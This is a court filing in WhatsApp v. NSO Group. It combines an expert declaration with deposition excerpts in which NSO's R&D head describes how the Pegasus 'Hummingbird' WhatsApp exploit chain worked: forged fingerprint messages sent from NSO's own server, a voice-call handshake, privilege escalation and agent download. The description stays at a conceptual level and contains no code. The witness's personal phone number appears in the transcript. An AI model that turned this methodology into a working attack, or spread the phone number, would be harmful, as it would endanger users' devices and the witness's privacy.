**No. 25-7380**

# UNITED STATES COURT OF APPEALS FOR THE NINTH CIRCUIT

WHATSAPP LLC; META PLATFORMS, INC.,

*Plaintiffs-Appellees*,

v.

NSO GROUP TECHNOLOGIES LIMITED;

Q CYBER TECHNOLOGIES LIMITED,

*Defendants-Appellants*.

On Appeal from the U.S. District Court for the Northern District of California, No. 4:19-cv-07123, Hon. Phyllis J. Hamilton

## PLAINTIFFS-APPELLEES'

## SUPPLEMENTAL EXCERPTS OF RECORD (SER-1-123)

Greg D. Andres
Antonio J. Perez-Marques
Luca Marzorati
DAVIS POLK & WARDWELL LLP
450 Lexington Avenue
New York, NY 10017
(212) 450-4000

Micah G. Block
DAVIS POLK & WARDWELL LLP
900 Middlefield Road, Suite 200
Redwood City, CA 94063 (650)
752-2000

*Attorneys for Plaintiffs-Appellees*

May 13, 2026

Greg D. Andres
Antonio J. Perez-Marques
Craig T. Cagney
Gina Cora
Luca Marzorati
  (admitted *pro hac vice*)
DAVIS POLK & WARDWELL LLP
450 Lexington Avenue
New York, New York 10017
Telephone: (212) 450-4000
Facsimile: (212) 701-5800
Email:   greg.andres@davispolk.com
         antonio.perez@davispolk.com
         craig.cagney@davispolk.com
         gina.cora@davispolk.com
         luca.marzorati@davispolk.com

Micah G. Block (SBN 270712)
DAVIS POLK & WARDWELL LLP
1600 El Camino Real
Menlo Park, California 94025
Telephone: (650) 752-2000
Facsimile:  (650) 752-2111
Email:   micah.block@davispolk.com

*Attorneys for Plaintiffs*
*WhatsApp LLC and Meta Platforms, Inc.*

UNITED STATES DISTRICT COURT

FOR THE NORTHERN DISTRICT OF CALIFORNIA

OAKLAND DIVISION

| | |
|---|---|
| WHATSAPP LLC and META PLATFORMS, INC., a Delaware corporation, | Case No. 4:19-cv-07123-PJH |
| Plaintiffs, | **REPLY DECLARATION OF DAVID J. YOUSSEF IN SUPPORT OF PLAINTIFFS' MOTION FOR PARTIAL SUMMARY JUDGMENT** |
| v. | Action Filed: October 29, 2019 |
| NSO GROUP TECHNOLOGIES LIMITED and Q CYBER TECHNOLOGIES LIMITED, | |
| Defendants. | |

**SER-2**

is a security mechanism employed by the Official Client in 2019 by which the Official Client would associate certain devices, e.g. WhatsApp servers, with specific cryptographic certificates, in order to prevent the interception, modification, or redirection of traffic intended for those devices.

13. In my expert opinion, it would not have been possible for the Official Client to send messages created by the WIS to WhatsApp's servers, as described by Mr. Gazneli, unless the Official Client had been modified, or the traffic generated by the Official Client was intercepted and manipulated by the WIS and then sent by the WIS to WhatsApp's servers. NSO has not produced any technical documentation that shows, or even indicates, that this would have been possible using an unmodified Official Client.

14. In my Opening Report, based on my personal experience and research, I state that "the user's acceptance of WhatsApp's Terms of Service . . . must be done before completing the WhatsApp registration process," and "[o]nly once the sign-up process has been completed can the user access the WhatsApp services and the full functionality of the WhatsApp Client Application." Ex. A at 26-27.

15. Counsel for Plaintiffs has asked me to determine, to the extent possible, from publicly available materials how WhatsApp's registration process would have appeared to NSO in 2018 and 2019.

16. Based on the logs from the AWS Server, I identified two versions of WhatsApp targeted by NSO's exploit in 2018 and 2019 ("2.18.380-45261" and "2.19.98-452742"). I was then able to locate copies of the Android Package Kit ("APK") files for those versions of WhatsApp on APK Mirror,[1] an online repository that archives APK files for older versions of mobile Android applications. Version 2.18.380-45261 was uploaded to APK Mirror on December 13, 2018, and version 2.19.98-452742 was uploaded on April 10, 2019. In my expert opinion, APK Mirror is a reliable source for such archived APK files that I use in the regular course of my work.

17. After installing the APK files on a test Android device, I was able to run the applications and determined that the first screen shown to a user in both versions is the same, and

---

[1] https://www.apkmirror.com

4

REPLY DECLARATION OF DAVID YOUSSEF IN SUPPORT OF PLAINTIFFS' MOTION FOR PARTIAL SUMMARY JUDGMENT
CASE NO. 4:19-CV-07123-PJH

Docusign Envelope ID: D90B0240-8FD7-43BF-B4C6-6827A4FE726D3

requires the user to consent to WhatsApp's Terms of Service before the user can progress further in the application.  Figures 1 and 2 below are screenshots of the initial screen on version 2.18.380-45261 and version 2.19.98-452742, respectively.  The screen contains the language "Read our Privacy Policy.  Tap 'Agree and Continue' to accept the Terms of Service," immediately above a large green button that reads "Agree and Continue."  The terms "Privacy Policy" and "Terms of Service" are blue hyperlinks, and the hyperlink for "Terms of Service" directs users to https://www.whatsapp.com/legal/#terms-of-service.  That URL directs to a webpage currently containing WhatsApp's Terms of Service.  Archived versions of that webpage from the dates that the APK files were uploaded to APK Mirror also contain the Terms of Service, with a notation that they were last modified on August 25, 2016.[2]  The user must click on the "Agree & Continue" button in order to progress further in the application, including to create an account and send messages.

---

[2] https://web.archive.org/web/20181213053133/https://www.whatsapp.com/legal/#terms-of-service (archive on Dec. 13, 2018); https://web.archive.org/web/20190410071846/https://www.whatsapp.com/legal/#terms-of-service (archived on Apr. 10, 2019).

5

REPLY DECLARATION OF DAVID YOUSSEF IN SUPPORT OF PLAINTIFFS' MOTION FOR PARTIAL SUMMARY JUDGMENT
CASE NO. 4:19-CV-07123-PJH

Docusign Envelope ID: D90B0240-8FD2-43CF-B4C6-682344FE726D3



*Figure 1: Initial Screen on WhatsApp version "2.18.380--45261"*

*Figure 2: Initial Screen on WhatsApp version "2.19.98-45274".*

I declare under penalty of perjury that the foregoing is true and correct.

Executed on October 18, 2024 in New York, NY.



/s/

David J. Youssef

---

6

**SER-5**

# EXHIBIT 6

## FILED UNDER SEAL

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 1

H I G H L Y   C O N F I D E N T I A L

ATTORNEYS' EYES ONLY

NORTHERN DISTRICT OF CALIFORNIA

OAKLAND DIVISION

Case No. 4-19-cv-07123-PJH

-------------------------------------

WHATSAPP INC., a Delaware corporation,

and META PLATFORMS INC., a Delaware corporation,

        Plaintiffs,

v.

NSO GROUP TECHNOLOGIES LTD and

Q CYBER TECHNOLOGIES LTD,

        Defendants.

-------------------------------------

   Deposition of TAMIR GAZNELI, taken by AILSA

 WILLIAMS, Certified Court Reporter, held at the

 offices of Davis Polk & Wardwell, London, United

    Kingdom, on 4 September, 2024 at 9:00 a.m

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 78

WhatsApp client that was being used as part of the R&D?

A   They were not activated against the real WhatsApp server because about they were used in the internal server.

Q   So the endpoint WhatsApp client that was being tested during that phase when you were working in the internal environment, that was not an actual WhatsApp client?

MR. AKROTIRIANAKIS:  Object to the form of the question.  Also misstates his testimony.

A   I would say towards the actual WhatsApp client, it was connected and activated towards the internal WhatsApp server.

Q   And as part of that phase of the development, did NSO create WhatsApp accounts?

MR. AKROTIRIANAKIS:  Object to the form of the question.  Also vague.

A   How to define WhatsApp account?  Is WhatsApp account a live WhatsApp account that is connected to a real WhatsApp server?

Q   Do you have WhatsApp?

A   Yes.

Q   Did you create an account when you signed up for WhatsApp?

Page 79

A   Yes.

Q   So you understand what that means, in terms of creating a WhatsApp account?

A   I understand what you mean in this question.  That is why I asked the previous question.

Q   So --

A   When you say activating WhatsApp account, it is not real if it is not connected to a real WhatsApp server.

Q   So in the sense that you created a WhatsApp account -- before I ask that, what phone number is your WhatsApp account associated with?

A   With my personal phone number.

Q   And what is that phone number?  The reason I ask is because we have some WhatsApp chats that have numbers without names and so we would like to be able to determine whether you are the person on them.

A   Okay.  So you ask for my phone number?

Q   Yes, please?

A   0508803185.

Q   Thank you.  Again, it is not to invade your privacy.  It is so we can match it to

Page 80

documents.

Q   Were any live WhatsApp accounts created during any phase of the testing of the Hummingbird vectors by NSO?

A   Yes.

Q   Could you say approximately how many?

MR. AKROTIRIANAKIS:  Objection, foundation.

Q   You understand you are designated as a corporate representative on the research and development of the relevant spyware, right?

A   I wouldn't call it spyware.

Q   I am just reading from the actual topic.  You understand you are designated on that?

MR. AKROTIRIANAKIS:  He is designated on the topics as phrased in NSO Group Technologies and Q Cyber Technology Limited's objection and responses to the notice of deposition.

Q   And you understand that that includes research and development of software including the Hummingbird vectors?

A   Yes.

Q   You are here to present NSO and Q Cyber's full corporate knowledge on those topics,

Page 81

right?

A   Yes.

Q   And so could you say approximately how many WhatsApp accounts were created as part of the testing of the Hummingbird vectors?

A   I don't have the exact number, but I can estimate it is about 50 numbers.

Q   And then when the Hummingbird vectors are actually used, are additional WhatsApp accounts created at that point?

A   At the customer?

Q   In connection with use by a customer, if that is how you would like to phrase it?

A   Yes.

Q   Do you have any understanding of approximately how many times -- let me put it this way -- on how many target devices the Hummingbird vectors have been successfully used by NSO?

MR. AKROTIRIANAKIS:  No foundation.

A   When you say Hummingbird was used, what do you mean by that?

Q   Used as -- successfully used as an installation vector to cause the installation of the agent?

21 (Pages 78 - 81)

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 82

A  In which timeframe?

Q  What I will call the relevant timeframe, so April 2018 to May 2020?

MR. AKROTIRIANAKIS:  Object to the form of the question.

A  I don't have an exact number.

Q  Approximately?

MR. AKROTIRIANAKIS:  No foundation.

A  So you ask in terms of how many times customers tried to use Hummingbird?

Q  Successfully?

A  Customers?  The question is about customers?

Q  How many times the Hummingbird vectors were successfully used to install the agent on a target device during the relevant period?

MR. AKROTIRIANAKIS:  No foundation.

A  I don't have the exact number.

Q  I understand you don't have the exact number.  I am asking for an approximate number.  Tens, hundreds, thousands, tens of thousands?

MR. AKROTIRIANAKIS:  No foundation.

A  It is not tens of thousands but it

Page 83

is not hundreds.

Q  So thousands?

A  In between, yes.

Q  In between hundreds and hundreds of thousands?

A  No.

MR. AKROTIRIANAKIS:  Objection, misstates his testimony?

Q  In between what?

A  In between hundreds and tens of thousands.

Q  Got it.  When NSO researchers created live WhatsApp accounts, as part of the R&D that led to the Hummingbird vectors, did they install WhatsApp via web, via mobile or how did they install it?

A  On the device itself.

MR. AKROTIRIANAKIS:  Objection, misstates his testimony.

Q  So via mobile?  On a mobile device?

A  On mobile device.

Q  The term "Pegasus", does that to you mean the agent or is it broader than the agent?

A  This is the name of the product.

Q  And does that include the

Page 84

installation vectors or would Pegasus be the agent itself?

MR. AKROTIRIANAKIS:  Objection, vague.

MR. PEREZ-MARQUES:  I just want to clarify our terminology so I can make the questions clearer.

A  The product that is called Pegasus eventually delivers the data to the customers which are sent to the customers by the agent, and and the agent installed using installation investigators.

Q  And so the agent is part of Pegasus?

A  Yes.

Q  And the installation vectors are part of Pegasus?

A  Yes.

Q  And the agent is the piece of Pegasus that actually delivers information to customers?

A  Yes.

Q  And that information is obtained from the target devices?

A  Yes.

Q  And so you are familiar with Pegasus, yes?

Page 85

MR. AKROTIRIANAKIS:  Objection, vague.

A  In what terms?

Q  I mean you are the head of R&D at NSO.  You are familiar with Pegasus?

A  Yes.

Q  And you are familiar with the agent?

A  Yes.

Q  Did you have any role in the development of the agent?

A  No.

Q  Are you familiar with the source code for the installation vectors, the Hummingbird vectors?

A  As I said before, part of it, but not all of it.

Q  What part are you familiar with?

A  No specific part.  I said I don't recall any -- each of the lines of the --

Q  You mean you are generally familiar with the source code for the Hummingbird vectors?

A  Yes.

Q  And you are familiar with how the agent functions?

MR. AKROTIRIANAKIS:  Objection, vague.

A  Because I was never part of agent

22 (Pages 82 - 85)

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 86

teams and development teams, I am familiar with the concepts, not the implementation.

Q   And you understand that you have been designated as a corporate representative on the full functionality of what is defined as the relevant spyware?

MR. AKROTIRIANAKIS:  Again, I don't want keep saying this but he is designated as stated in our responses to the notice of deposition.

MR. PEREZ-MARQUES:  Yes, okay.  And as stated by your counsel that includes defendant's understanding of the full functionality of what they call the accused technology.  Yes?

A   Yes.

Q   Again with the same time period, which I won't keep repeating, April 2018 to May 2020.

I would like to show you -- and you are prepared to testify as to NSO and Q Cyber's corporate knowledge on that functionality of the relevant spyware?

A   Yes.

Q   One follow-up.  We were talking about the creation of the WhatsApp accounts as part of the R&D process.  When were those accounts

Page 87

created?

A   When you move to phase of testing in the real word.

Q   In the real environment?

A   Yes.

Q   I think you previously estimated that was around April 2018?

A   I said near.

Q   When was the testing complete, such that the first of the Hummingbird vectors could be deployed?

A   As I said before, I don't recall the exact month.

Q   Okay.  Was it also in 2018, the following year?

A   Heaven?

Q   Mm hmm.

A   2018.

Q   I would like to show you what we have marked as Exhibit 2032.

(Exhibit 2032 marked for identification)

This is a multipage document with the Bates stamp NSO_WHATSAPP_00045678.  Do you recognize this document?

A   Do you want me to go over it?

Page 88

Q   Feel free to flip through it.  The first question is just whether you recognize it.

Do you recognize this document?

A   Yes.

Q   What is it?

A   Some kind of training material, training -- customer facing material.

Q   Customer facing material or training material?

A   Training.

Q   Training.  Is it a product description for Pegasus?

A   Yes.

Q   So the endpoint solution that is referred to here is Pegasus?

MR. AKROTIRIANAKIS:  Objection, vague.

Withdrawn.

A   Yes.

Q   Did you have any role in preparing Exhibit 2032?

A   No.

Q   I would like to direct you to page one where there is an "Overview" section.  Do you see that?  Are you on that page?  It is after the table of contents.  There you go.

Page 89

A   Yes.

Q   The third paragraph there revs to Pegasus as a "breakthrough solution, developed by veterans of elite intelligence agencies".  Do you see that?  It is the third paragraph under "Overview"?

A   Yes.

Q   And do you agree with the characterization of Pegasus as a breakthrough solution?

A   As for the date, I think it was breakthrough, yes.

Q   It is a highly innovative product?

A   Yes.

Q   Highly sophisticated?

A   I think it depends on the definition of sophisticated.  By what means?

Q   Would you consider it a very sophisticated product?

A   Yes.

Q   Is it accurate that it was developed by veterans of elite intelligence agencies?

MR. AKROTIRIANAKIS:  Objection, vague.

A   The company was established in 2010, so it depends on who it refers to in this

23 (Pages 86 - 89)

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 142

Q Why can't you describe the research techniques?

A Because, as my counsel stated, I am restricted by Israeli law to talk about it.

Q So there is nothing further that you are willing to testify as to the research techniques that went into identifying vulnerabilities in WhatsApp client?

MR. AKROTIRIANAKIS: Objection.

A It doesn't have anything to do with willingness. I am restricted by Israeli law to talk about it.

MR. AKROTIRIANAKIS: I will object to the form of that question. If you want to ask him questions he can tell you whether he can testify about or not. I think it is a fair question. It is the way you just stated it.

Q My fundamental question is how did the R&D team at NSO go about finding vulnerabilities in the WhatsApp client?

A They researched the activity of the WhatsApp client in order to find flaws and to build the installation vectors which, as I said, is built to eventually deliver the agent payload.

Q How did the team research the

Page 143

activity of the WhatsApp client?

A What does the question refer to in how?

Q That is my question. How did they do that? You said they researched the activity of the WhatsApp client. How did they do that?

A So I will get back to the explanation about the ecosystem we built internally. We built internal ecosystem of WhatsApp server that enabled us internally to send messages between two peers between customer owned devices, and having this ability enables us to research the activity of the WhatsApp client.

Q How did you know how to build that internal ecosystem?

A What do you mean by how?

Q How did you determine what the characteristics of that internal ecosystem should be in order to operate like a WhatsApp client?

A We have the client and we have the server between them.

Q And so how do you go from having the client to building an ecosystem that replicates it?

A So as a researcher, especially in

Page 144

Android, you have the ability to gain the routabilities on any Android devices. These abilities are stated for anyone using the web. Whenever you have route access on a device, you have the ability to monitor the traffic that is in and out the monitored device, and then you have access to the traffic from peer to peer. Using this knowledge you can use it to build the ecosystem which is required for this activity.

Q Is there anything else that the NSO R&D team did to find vulnerabilities in the WhatsApp client?

A We, the R&D research group, used all the tools it should use in order to be able to find the vulnerabilities.

Q What are those tools?

A Basically, there are two types of tools, called IDA and JEB.

Q Can you spell those?

A I-D-A.

Q And what was the other?

A J-E-B.

Q And what is IDA?

A These are tools available for procurement -- anyone can buy it -- which enable

Page 145

you to analyze code.

Q What is the difference between IDA and JEB?

A IDA enables you to analyse native code and JEB analyzes Java code.

Q Other than using those two tools, what else did the R&D team do to find vulnerabilities in the WhatsApp client?

A As I said before, it monitored the transmission between peer to peer as for the communication, in order to understand the responses and the message content that should be sent from side to side.

Q Through that testing, did NSO develop an understanding of the functioning of WhatsApp's servers that were involved in the peer to peer transmission?

MR. AKROTIRIANAKIS: Objection, misstates his testimony.

A Through this activity the aim was to find vulnerability on the Android ecosystem, and then find a way to make it work remotely.

Q With respect to that second part of making it work remotely, through its internal testing, did NSO develop an understanding of how

37 (Pages 142 - 145)

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 146

WhatsApp's servers functioned in connection with peer to peer communications?

A   As for the terminology functions, I will say that we worked to understand what are the limitations in terms of sending messages from peer to peer.

Q   What do you mean by that?  What are the limitations in terms of sending messages peer to peer?

A   What are the messages and the content of messages that can be sent from peer to peer.

Q   As part of this work did NSO researchers reverse engineer any WhatsApp code?

MR. AKROTIRIANAKIS:  Objection, vague.

A   Do you want to define what reverse engineering is?

Q   What do you understand reverse engineering to mean?

A   I would say that using these tools I talked about, IDA and JEB, the research group had the ability to understand how the code functions, some of the parts.

Q   Mm hmm.  What do you understand reverse engineering to mean?

Page 147

MR. AKROTIRIANAKIS:  Objection, no foundation.

A   I would talk about the aim of this activity, and the aim is to learn the mechanisms and the way client functions.

Q   And that is something NSO's research group did with respect to WhatsApp client, as part of the development of the Hummingbird vectors?

A   Yes.

MR. PEREZ-MARQUES:  Why don't we pause here and grab lunch and then we can resume.

THE VIDEOGRAPHER:  Going off the record. The time is 13:02.  End of media card number three, volume one, of the video deposition of Tamir Gazneli.

(Break for lunch.)

This is the beginning of media card number four, volume one, in the video deposition of Tamir Gazneli.  Going on the record.  The time is 13:52.

MR. PEREZ-MARQUES:  Mr. Gazneli, do you understand you are still under oath?

A   Yes.

Q   Before we broke we were talking a bit about the research and development that went

Page 148

into the development of the Hummingbird vectors. Do you recall that generally?

A   Yes.

Q   At one point in that examination you said that there were issues that you couldn't discuss because of your understanding of Israeli legal restrictions.  Is that right?

A   I was addressing to specific research techniques.

Q   The specific research techniques you understand yourself not to be at liberty to discuss?

A   I am not allowed to discuss here.

Q   When you say you are not allowed, that is because of Israeli law, as you understand it?

A   Yes.

Q   Is it a specific Israeli law that you are referring to?

A   To the restrictions.  I don't know specifically.

Q   The Defense Expert Control Act. Okay.  Not a specific order in this case but the expert control law generally.

A   Yes.

Page 149

Q   So when you were describing the research that went into the development of the Hummingbird vectors, there is an aspect of the research techniques that you have not included in your testimony.  Right?

MR. AKROTIRIANAKIS:  Objection, misstates his testimony.

A   Pardon?  I talked about my disability in terms of defining the specific and in-depth techniques of research.

Q   And those research techniques that went into the development of the Hummingbird vectors, you are not at liberty to discuss?

A   Yes, I am not allowed to discuss.

Q   You also testified early in the day about having reviewed some code as part of your preparation to testify here today?

A   Yes.

Q   And I believe you said it was fingerprinting or related to fingerprinting?

A   Yes.

Q   Was that in connection with a particular Hummingbird vector?

A   No.  I said that it was around the timeframe, the relevant timeframe.

38 (Pages 146 - 149)

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 154

A   Yes.

Q   Did you have any role in preparing this document?

A   No.

Q   Do you know approximately when it was prepared?

A   Not the exact date but if I remember right it was around the beginning of 2018.

Q   The first section there says "Assets we want to protect".  Do you see that?

A   Yes.

Q   And "protect" means protect from discovery by third parties?

MR. AKROTIRIANAKIS:  Object to the form.

A   Protect from being discovered at all.

Q   The first one listed there says:

"Resources of value we want to protect."

The first one is:

"Exploits and techniques that are being used as part of the installation vector.  The most important asset we want to protect, the WhatsApp exploit."

Do you see that?

A   Yes.

Page 155

Q   And that refers to the 0 click WhatsApp exploit that was known at this time as Heaven?

MR. AKROTIRIANAKIS:  Objection.  The question is vague.

A   At that particular time that was the exploit.

Q   Why was the Heaven exploit the most important asset that this team wanted to protect?

MR. AKROTIRIANAKIS:  Objection, misstates the document.

A   Again, this is the OpSec team's assessment of the specific capability, and he was directed to assess the Heaven capability, and as part of all the resources which are listed here, and we can go over each and every one of them, protecting the exploit is the most important in this list.

Q   More important even than the clients' identities?

A   Yes --

Q   More important than target awareness?

A   In order to be able to handle the risks in terms of client's identity, so target

Page 156

awareness, you wanted to start having the ability, the vulnerability, so yes.

Q   Below that there is a section titled "Solution Highlights", and the first thing under that says with some asterisks "New silent fingerprint".  What does that refer to?

MR. AKROTIRIANAKIS:  Objection, foundation.

A   I need to review it.

Q   Please.

A   So this is the description of new silent fingerprint that was suggested at that time.

Q   And what was the new silent fingerprint?  What does that refer to?

A   To a way of implementing the fingerprint.  The "new" comes in terms of new way to implement it.

Q   And what was new about it?

A   Different number of messages, different type of activities in terms of client endpoint and target, yes.

Q   Before we continue with that section, in the resources of value we want to protect, number 5 says "Live systems (IS\PS\WIS)."

Page 157

A   Yes.

Q   What is IS?

A   Installation server.

Q   Installation server.  And what is PS?

A   Pegasus server.

Q   What is WIS?

A   This is the acronym of WhatsApp installation server, but it means an Android server which is responsible for installing the end solution.

Q   And installing it by transmitting a message through WhatsApp?

MR. AKROTIRIANAKIS:  Objection, misstates testimony.

A   Installing it by sending the required messages to the target's WhatsApp client.

Q   And you understand that those WhatsApp messages travel through WhatsApp's ecosystem?

A   Any message in the WhatsApp ecosystem travels through WhatsApp's ecosystem.

Q   Including the ones that were being sent as part of the Hummingbird installation vectors, right?

40 (Pages 154 - 157)

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 158

A  Yes.

Q  Under "New silent fingerprint", it says:

"In order to get target's device, OS details plus WA client version, we need to send a fingerprint request."

Do you see that?

A  Yes.

Q  And OS is operating system, right.

A  Yes.

Q  And WA client version, that is what version of WhatsApp the target is running?

A  Yes.

Q  It says:

"Fingerprint is done by sending a forged request from a client that mimics a server response to the target WA client."

What does that mean?

MR. AKROTIRIANAKIS:  Objection.  No foundation.

A  As I read it, it means send specific message from one client to the target client.

Q  What does it mean that it is a forged request?

MR. AKROTIRIANAKIS:  Objection, no

Page 159

foundation.

A  Again, as I read it --

Q  Before you continue, you are designated as the corporate representative on the full functionality of Pegasus during this time period.  Yes?

A  Yes.

Q  And you are prepared to bring to bear NSO and Q Cyber's full corporate knowledge on that topic?

A  Yes.

Q  Okay.  So what does "forged request" mean?

MR. AKROTIRIANAKIS:  Objection, no foundation.  You also misstated the witness' obligation and the company's obligation under rule 30(b)(6).  If you understand the question you can answer it.  You can go ahead.

A  It says that it mimics servers response to the client's target.

Q  What does it mean -- sorry, were you finished?

A  Yes.

Q  What does it mean that it mimics the server response?

Page 160

A  This is a response that the server generates, and it mimics that message towards the client, the target's client.

Q  So it sends a message that appears to be a server response?

A  Yes.

Q  But is not an actual server response?

A  It could be a server response but it was generated by the source client.

Q  And the source client is a client that NSO developed, right?

A  Yes.

Q  Did that source client have a name by which you referred to it?

A  This is implemented inside the WIS server.

Q  So within the WIS server there is a source client created by NSO.  Is that right?

MR. AKROTIRIANAKIS:  Objection, misstates his testimony.

A  It includes the required functionalities that are relevant and required for this purpose of this vector.  Not an entire client.

Page 161

Q  Got it.  So it doesn't necessarily have everything that a real WhatsApp client would have, correct?

MR. AKROTIRIANAKIS:  Objection.

Q  But it has sufficient aspects --

MR. AKROTIRIANAKIS:  Objection.  The question is vague.

Q  But it has the aspects of the WhatsApp client that are necessary to carry out the installation vector?

MR. AKROTIRIANAKIS:  Object to the form of the question.

A  It has the ability to send messages from that source to the target's client application.

Q  And would you refer to that source client as the WIS or would you have another way to refer to it?

A  WIS.

Q  Got it.  Okay.  To be clear, the WIS is not an actual WhatsApp client, correct?

A  This is not an actual WhatsApp client.  It uses part of the protocol capabilities to be sent from one source to the target.

Q  So NSO created its own source client

41 (Pages 158 - 161)

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 162

in WIS that had certain of those same capabilities?

A   Yes.

Q   And the forged request that is referred to there, that is the same thing as the mimicked server response, or are those two different things?

A   This is the same one.

Q   So it is a message sent by WIS that appears to be legitimate WhatsApp traffic but is not, right?

MR. AKROTIRIANAKIS:  Objection, misstates the document.

A   This is legitimate by the target that received it and by the ecosystem that transferred the message from peer to peer.

Q   But it is not an actual response from the WhatsApp server, right?

A   It could be.

Q   Right.  It appears to be, right?

A   No, it could be.

MR. AKROTIRIANAKIS:  Objection.

Q   So then I am going to have to go back because you lost me.  When it says it is a forged request that mimics a server response, you

Page 163

are saying that could be a legitimate WhatsApp server response, so it is not forged or mimicked. It actually could just be a WhatsApp server response?

A   It is mimicked and forged in terms of maybe sequence, maybe timing, maybe content, but it for sure can be a valid response from the server.

Q   Right, except that it doesn't originate from the WhatsApp server.  It originates from WIS?

A   You stated before that everything is transferred -- transformed throughout the WhatsApp servers, so it practically originated from -- got sent through and landed on the WhatsApp client, on the target's device.

Q   Right, originating from WIS?

A   Yes, and transferring to WhatsApp ecosystem.

Q   But it is not a request that the WhatsApp client, the standard WhatsApp client would have the ability to send?

MR. AKROTIRIANAKIS:  Object to the form of the question.

A   We will have to discuss what is --

Page 164

who is using and what are the capabilities of WhatsApp client.

Q   But I couldn't open up my WhatsApp and send this forged request right now, could I?

A   No.

Q   So it is something that NSO, through its R&D function, developed the capability to transmit.

A   Yes.

Q   How did NSO obtain the information necessary to mimic a WhatsApp server response?

A   So we get back to what you just discussed before, in terms of having company owned devices which can be routed by procedures that anyone can access in the web, and having this type of router devices you can get access to anything that is transmitted from and to the smartphone.

Q   The last bullet in that same section says:

"The messages are non-standard messages that are sent by our unique WhatsApp client."

Do you see that?

A   Yes.

Q   In what respect are these messages non-standard?

Page 165

A   As I said in the sequence, timing content.

Q   All of the above?  Sequence, content and timing?

A   It depends on the message, specific message.

Q   Meaning that on some occasions that Heaven is used it might be non-standard, in terms of sequence, in other times it might be non-standard in terms of content?

MR. AKROTIRIANAKIS:  Objection, misstates the document.

A   Again, this line refers to the specific new fingerprint that was described here and addresses the messages that are sent using this new fingerprint.  I cannot and don't have any way to understand what that specific team that analysed and described this or did the document referred to the message.

Q   You don't know, having prepared for this or based on your personal knowledge either in what respect those messages were non-standard?

A   No.

Q   You don't dispute that the messages sent as part of new silent fingerprint were

42 (Pages 162 - 165)

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 182

A   Okay.  Yes, in this step, yes.

Q   In this context.  The second payload you mentioned, so the one that came before download of the agent, that enables the privilege escalation, does that payload have a name?

A   It is referred as PE, which is acronym of privilege escalation.

Q   Got it.  Where does the agent payload come from to be downloaded on to the device?

A   From servers which are under customer's custody, the ecosystem of infrastructure that is deployed.

Q   Those are part of the anonymized servers established by NSO as part of the anonymizing transmission network for a customer?

A   Yes.

Q   If we go back to Exhibit 2033, there is a few bullets under "Attack".  Do you see that?

A   This is as I said his termination -- terminology, and how he calls this space.

Q   I am just asking if you see it.

A   I see it.

Q   Am I right in understanding, based on what you have just described, that the bullets

Page 183

that follow "attack" here are what you call phase one, gaining remote access?

A   Yes.

Q   And so it says:

"In order to attack we initiate a WhatsApp voice call with target."

Do you see that?

A   Yes.

Q   And that is the first step of what you call phase one?

A   Yes.

Q   And that WhatsApp voice call is initiated from NSO's WIS.  Is that right?

MR. AKROTIRIANAKIS:  Objection, misstates his testimony.

A   NSO's WIS code is able to send messages that initiates the WhatsApp voice call, on the endpoint WhatsApp target, WhatsApp client.

Q   It continues:

"As part of the call, initiation handshake between our WIS client and target's WhatsApp client."

Let me pause there.  What does that refer to, "Initiation handshake between our WIS client and target's WhatsApp client"?

Page 184

A   As I said, this is part of protocol messages which are required to initiate the WhatsApp call.  It is not a single message.  It is back and forth messages which are handshaked between the source and the target.

Q   And that occurs through the WhatsApp servers?

A   As we said before, every transmission between two peers have to be transmitted through WhatsApp servers.

Q   Including this transmission that we are talking about here?

A   Including this, yes.

Q   Except a normal peer to peer communication through WhatsApp would be with one WhatsApp client and another, correct?

MR. AKROTIRIANAKIS:  Object to the form of the question.  Vague.

A   Would you call bot originating a call normal activity?

Q   No.

A   Okay.

Q   A standard, regular WhatsApp call would be from one WhatsApp client to another. Right?

Page 185

MR. AKROTIRIANAKIS:  No foundation.

A   As I said before, we were initiating a call, a WhatsApp call, between two peers. Whether it is normal or not, it is like -- I don't have any way to answer this question.

Q   My question was different.  I asked you in a normal WhatsApp voice call, one WhatsApp user calls another WhatsApp user, that would be a WhatsApp client on both sides.  Right?

A   Yes.

Q   And so what NSO is doing as part of the Heaven and Eden exploits was different than that.  Right?

MR. AKROTIRIANAKIS:  Objection, misstates testimony.

Q   Because on one side of the call wasn't a WhatsApp client, right?

A   There was code which was able to send messages using WhatsApp client on one side source to the second endpoint which is target's WhatsApp client.

Q   Right, but as we have talked about at length already, on the source side it is not a WhatsApp client, right?  It is the WIS which NSO created, correct?

47 (Pages 182 - 185)

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 186

A   I would clarify.

Q   Can I just get a yes or no to that so we are all on the same page?

A   The answer is no.

MR. AKROTIRIANAKIS:  He is going to answer the question --

Q   Go ahead then.

A   Go ahead with the question.  The question was --

Q   You were going to answer.  On the source side, it is not a WhatsApp client, it is the WIS which NSO created.  Isn't that correct?

A   The messages are built and sent from the WIS client.  These messages have to be sent from an application.  Client is notified, which he uses to connect to the application and sends the messages through a real and active client.

Q   Through an active WhatsApp account?

A   Yes.

Q   And whose account would that be?

A   Accounts were established for the customer.

Q   So the message is generated by the WIS?

A   Yes.

Page 187

Q   But it is put into the WhatsApp servers by an actual WhatsApp client?

A   WIS has a connection to a client which is activated through the normal procedures of client activation.

Q   Meanings it uses like an authentication token from an actual account?

MR. AKROTIRIANAKIS:  Had you completed your answer before he --

A   No.

Q   Go ahead.

A   WIS crafts messages which are required to initiate the call and test connectivity with the client which was activated for each and every customer.  It was connected to the WhatsApp system as a normal client because it is a normal client, and sent, and the message is sent by normal client from one peer to a normal client that target's device.

Q   And so in addition to the WIS there is a stand-alone client, genuine WhatsApp client on the source side of this transmission?

A   Yes.

Q   And so the message is created by the WIS but transmitted through that WhatsApp client?

Page 188

A   Yes.

Q   And when you said it has connectivity, the WIS has connectivity to a genuine WhatsApp client, what did you mean by that?

A   I mean that it has to be -- it has to have a way to connect the target and send the message to the target.

Q   So the WIS is able to send the message it created through that WhatsApp client?

A   Yes.

